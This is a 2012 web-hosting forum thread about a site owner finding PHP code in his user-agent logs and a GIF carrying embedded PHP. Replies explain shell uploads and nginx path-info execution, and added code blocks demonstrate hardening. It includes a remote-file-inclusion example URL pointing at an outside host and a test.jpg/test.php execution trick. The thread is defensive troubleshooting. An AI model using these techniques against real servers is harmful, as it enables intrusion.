
site been hacked, see strange in the log




Posted by heropage, 11-30-2012, 11:53 AM
What does this thing do? I mean, this field should be something like "Mozilla/5.0...", so how come it can be PHP code?

Posted by TravisT-[SSS], 11-30-2012, 12:11 PM
From the looks of it, they were trying to get a shell uploaded to your system, or maybe that was their intent. Why that is in the UA field I have no idea... I would just ensure the application is secure and won't allow files to be executed with .htaccess.

Posted by heropage, 11-30-2012, 12:21 PM
I have disabled the PHP function system() now. What do you mean by "the hacker was able to upload a shell PHP script to one of my writable folders"? I am not sure how they did it. But my site allows users to upload image files, and the attachment is the GIF file the hacker uploaded. Inside the GIF file they embedded PHP code, but I am not sure how they can execute the PHP code inside a GIF file.

Posted by Ash, 11-30-2012, 12:47 PM
Often they don't, and rely on you to do it for them. You need to look at securing the point where users upload images; with basic checks like getimagesize(), an image file with PHP injected can still be seen as just an image. Depending on how you then display the images, it'll be parsed as PHP and executed.
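To make Ash's point concrete, here is an added example (not code from the thread) that builds a harmless GIF/PHP polyglot with GD, shows that getimagesize() accepts it, and then strips the embedded text by decoding and re-encoding the image. The "planted" marker is a constructed stand-in for whatever an attacker embeds; the GD extension is assumed to be installed.

```php
<?php
// Added example, not from the thread. Requires the GD extension.
declare(strict_types=1);

// Build a real 1x1 GIF with GD, then append text after the GIF trailer (0x3B).
// Image decoders stop reading at the trailer, so the file still "is" a GIF.
// The appended text is a constructed, harmless marker, not an attacker payload.
function buildConstructedPolyglot(): string
{
    $im = imagecreate(1, 1);
    imagecolorallocate($im, 255, 255, 255);
    ob_start();
    imagegif($im);
    $gif = ob_get_clean();
    imagedestroy($im);
    return $gif . "<?php echo 'planted'; ?>";
}

// The check many upload handlers rely on: does getimagesize() think it is an image?
// It only inspects the header, so anything after the pixel data is invisible to it.
function passesGetimagesize(string $bytes): bool
{
    return getimagesizefromstring($bytes) !== false;
}

// Cheap signature check for a PHP open tag (<?php, <?= or <?) anywhere in the file.
// Can false-positive on compressed pixel data, so treat a hit as "reject or
// re-encode", not as proof of an attack.
function containsPhpOpenTag(string $bytes): bool
{
    return strpos($bytes, '<?') !== false;
}

// Decode and re-encode. Only pixel data survives; comments, trailing bytes and
// metadata are discarded. Returns null if the bytes are not a decodable image of
// a type we are willing to store.
function reencodeImage(string $bytes): ?string
{
    $info = @getimagesizefromstring($bytes);
    if ($info === false) {
        return null;
    }
    $im = @imagecreatefromstring($bytes);
    if ($im === false) {
        return null;
    }
    ob_start();
    switch ($info[2]) {
        case IMAGETYPE_GIF:
            imagegif($im);
            break;
        case IMAGETYPE_JPEG:
            imagejpeg($im, null, 85);
            break;
        case IMAGETYPE_PNG:
            imagepng($im);
            break;
        default:
            ob_end_clean();
            imagedestroy($im);
            return null; // unsupported format: reject rather than store as-is
    }
    $clean = ob_get_clean();
    imagedestroy($im);
    return $clean;
}

$polyglot = buildConstructedPolyglot();
printf("getimagesize() accepts it:   %s\n", passesGetimagesize($polyglot) ? 'yes' : 'no');
printf("contains PHP open tag:       %s\n", containsPhpOpenTag($polyglot) ? 'yes' : 'no');
$clean = reencodeImage($polyglot);
printf("after re-encoding, tag left: %s\n", ($clean !== null && containsPhpOpenTag($clean)) ? 'yes' : 'no');
```

Run it from the command line with `php polyglot_check.php` (file name is an assumption). The first line prints "yes", which is exactly why getimagesize() on its own is not an upload check; re-encoding is the step that actually removes the embedded text, and an upload handler should store the re-encoded bytes, never the original.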

Posted by heropage, 11-30-2012, 12:56 PM
I have disabled image upload for now. My site displays images directly, like upload.mysite.com/photo/user.gif. But I have tried both on IE and FF, and it looks like the PHP didn't get executed. Could the hacker use something like MIME type sniffing to get it executed?

Posted by CoderJosh, 11-30-2012, 01:15 PM
See http://www.goitworld.com/nginx-php-f...vulnerability/ for an example (misconfigured nginx executing PHP code within an uploaded JPG image file in this case).

Posted by heropage, 11-30-2012, 02:35 PM
Thank you very much. I found my server has the exact issue. I created a PHP file, then just renamed it to, for example, test.jpg; then I ran mysite.com/test.jpg/test.php, and it's running the PHP code! This is scary! BUT the attachment I uploaded above (the GIF file) is kind of different. It's not just a pure PHP file, it IS a picture with PHP code embedded in it. I opened it on my site, but I did not see anything happen. Maybe the hacker has a better way to do so?
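The test.jpg/test.php behaviour heropage reproduced is the nginx/PHP-FPM path-info misconfiguration the linked article describes. The following is an added configuration example, not from the thread or the article; the paths, socket and `/photo/` prefix are assumptions. The weak block is shown first, then the corrected form.

```nginx
# WEAK: the common copy-paste PHP block. The regex matches any URI that ends in
# .php, including /photo/user.gif/test.php. PHP-FPM is told SCRIPT_FILENAME is
# /var/www/site/photo/user.gif/test.php; with cgi.fix_pathinfo=1 (PHP's default)
# it walks back up the path to the file that does exist, user.gif, and runs it.
location ~ \.php$ {
    include        fastcgi_params;
    fastcgi_param  SCRIPT_FILENAME $document_root$fastcgi_script_name;
    fastcgi_pass   unix:/run/php-fpm.sock;   # assumed socket path
}

# CORRECTED, two independent layers:

# 1. The upload directory never reaches the PHP handler, whatever the URI looks
#    like. ^~ makes this prefix match win over the regex location below, and the
#    nested location refuses anything inside /photo/ that ends in .php.
location ^~ /photo/ {
    location ~ \.php$ { return 403; }
    add_header X-Content-Type-Options nosniff;   # browser must not sniff a type
    try_files $uri =404;
}

# 2. Only hand PHP-FPM a file that really exists under exactly that name, so
#    /anything.jpg/test.php is a 404 instead of a script execution.
location ~ \.php$ {
    try_files      $uri =404;
    include        fastcgi_params;
    fastcgi_param  SCRIPT_FILENAME $document_root$fastcgi_script_name;
    fastcgi_pass   unix:/run/php-fpm.sock;
}

# Also set cgi.fix_pathinfo=0 in php.ini so PHP itself stops guessing which file
# on the path was meant.
```

After applying this, repeat heropage's own test (a renamed PHP file requested as /test.jpg/test.php) and confirm it now returns 404; that is the quickest check that the fix took effect.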

Posted by Kalriath, 11-30-2012, 09:43 PM
The hacker is probably hoping you have an insecure PHP web stats program that will simply pull the text out of the database and display (or execute) it. This way that line could potentially be run the next time you look at your web stats. I don't know of any stats programs vulnerable to such a basic security mistake, but that doesn't mean there isn't one.

Posted by Moo-Josh, 12-01-2012, 06:54 AM
Might be worth doing a maldet scan in case the user has uploaded any malicious shells as well. While maldet won't detect everything, it does a decent job!

Posted by Server Management, 12-01-2012, 11:33 AM
Do you have any scanning solution installed on this server?

Posted by nessic, 12-02-2012, 08:20 AM
The HTTP header can be used to manipulate bad coding. A lot of image web hosts are susceptible to this type of attack, which can allow an end user to use LFI/RFI hacks. Google "/proc/self/environ attack" and you'll find a lot of stuff regarding the type of attack you came under.

Posted by khunj, 12-03-2012, 07:46 AM
They will not run it on your server, but will use it to hack another server via remote file inclusion (e.g. http://victim.tld/index.php?var=http://yoursite.com/user.gif??]).

Posted by RRWH, 12-03-2012, 07:57 AM
I have a site where users can upload images, and sometimes PHP shells slip through. On the other side of the coin, they can never execute the PHP, as I have the server configured to intercept all requests for images and only display a file if it is an image. Having protection on the way up is fine, but someone will always work out how to get past your measures, so just make sure that you only output an image if that is what you expected.

Posted by heropage, 12-04-2012, 12:17 PM
Just found this, it's interesting! http://kaoticcreations.blogspot.ca/2...ities-via.html

Posted by whmcsguru, 12-04-2012, 01:46 PM
Any time you're storing things, or allowing them to be uploaded like this, you need to store those uploaded items in an off-web directory (i.e. /home/user/images, not /home/user/www/uploads). Make it more complicated for the hacker to actually do what they want to do.
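RRWH's "only output an image if that is what you expected" and whmcsguru's "store uploads outside the web directory" combine naturally into one gatekeeper script. The code below is an added example, not from the thread: the upload directory, the script name and the `f` query parameter are assumptions. Because a PHP script reads the bytes and echoes them, nothing in the stored file is ever handed to the PHP interpreter, no matter what is embedded in it, and the nosniff header answers heropage's MIME-sniffing question on the browser side.

```php
<?php
// Added example, not from the thread. Paths and parameter name are assumptions.
declare(strict_types=1);

const UPLOAD_DIR = '/home/user/images';   // outside the document root (assumed)
const ALLOWED = [                          // extension => the only MIME type we serve for it
    'gif'  => 'image/gif',
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'png'  => 'image/png',
];

// Returns [path, mime] for a file that is safe to serve, or null to answer 404.
function resolveImage(string $requested): ?array
{
    // Tight filename allowlist: no slashes, no dots other than the extension,
    // so traversal and double extensions never get as far as the filesystem.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\.(gif|jpe?g|png)\z/', $requested, $m)) {
        return null;
    }
    $ext  = strtolower($m[1]);
    $base = realpath(UPLOAD_DIR);
    $path = realpath(UPLOAD_DIR . '/' . $requested);
    if ($base === false || $path === false || !is_file($path)) {
        return null;
    }
    // Belt and braces: the resolved path must still live inside the upload directory.
    if (strncmp($path, $base . '/', strlen($base) + 1) !== 0) {
        return null;
    }
    // Decide the type from the bytes, not the name, and require it to agree with
    // the extension; getimagesize() additionally confirms it decodes as an image.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($path);
    if ($mime !== ALLOWED[$ext] || @getimagesize($path) === false) {
        return null;
    }
    return [$path, $mime];
}

function serveImage(string $requested): void
{
    $hit = resolveImage($requested);
    if ($hit === null) {
        http_response_code(404);
        return;
    }
    [$path, $mime] = $hit;
    header('Content-Type: ' . $mime);
    header('X-Content-Type-Options: nosniff');   // browser must not second-guess the type
    header('Content-Length: ' . (string) filesize($path));
    header('Content-Disposition: inline; filename="' . basename($path) . '"');
    readfile($path);
}

// Requested as /image.php?f=user.gif (script and parameter names are assumptions).
serveImage((string) ($_GET['f'] ?? ''));
```

Pair this with the web-server side: the upload directory should not be served directly at all, so the only route to a stored file is through this script, and a file that fails the checks simply produces a 404 rather than being handed to anything that could interpret it.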


